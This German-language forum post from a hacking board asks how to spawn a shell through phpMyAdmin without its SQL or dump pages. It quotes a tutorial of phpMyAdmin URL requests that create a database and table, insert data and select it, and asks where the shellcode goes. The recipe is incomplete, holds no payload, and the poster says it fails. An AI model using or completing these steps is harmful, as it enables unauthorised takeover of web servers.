PMA Hacken ohne SQL und READDUMP
Hallo Free-Hack
zu allererst: ich hoffe ich bin im richtigen Forum :)
ich wollte euch heute mal fragen ob es eine Möglichkeit gibt, eine Shell via PMA ohne SQL.php und Readdump.php zu spawnen.
Ich habe das Tutorial gefunden:
Code:
1. Eine Datenbank kann hiermit erstellt werden:
db_create.php?db=###db-name###
2. Eine Tabelle in der erstellten Datenbank kann man hiermit erstellen:
tbl_create.php?db=###db-name###&table=###tabelle###&num_fields=1&do_save_data=true&field_name[0]=###feld###&field_type[0]=TEXT
2b. Überprüfen ob erfolgreich:
tbl_change.php?lang=en-utf-8&server=1&collation_connection=utf8_general_ci&db=db&table=###tabelle###&goto=tbl_properties_structure.php&back=tbl_properties_structure.php
3. Tabelle füllen (insert)
tbl_replace.php?db=db&table=tabelle&goto=tbl_properties_structure.php&fields[multi_edit][0][data]=###inserted%20data###&insert_ignore_1=true
tbl_replace.php?db=db&table=tabelle&goto=edit_next&fields[multi_edit][0][data]=###inserted%20data###&insert_ignore_1=true
4. Select
tbl_select.php?db=db&table=tabelle&goto=tbl_select.php&back=tbl_select.php¶m[0]=data&session_max_rows=30&orderField=--nil--&order=ASC&where=1&submit=Go
Bei mir funktioniert es nicht... Ich habe ###db-name### usw ersetzt.
Wo muss der Shellcode rein? Vielleicht kann einer mir erklären wo ich was einsetzen muss damit es funktioniert..
mfg :)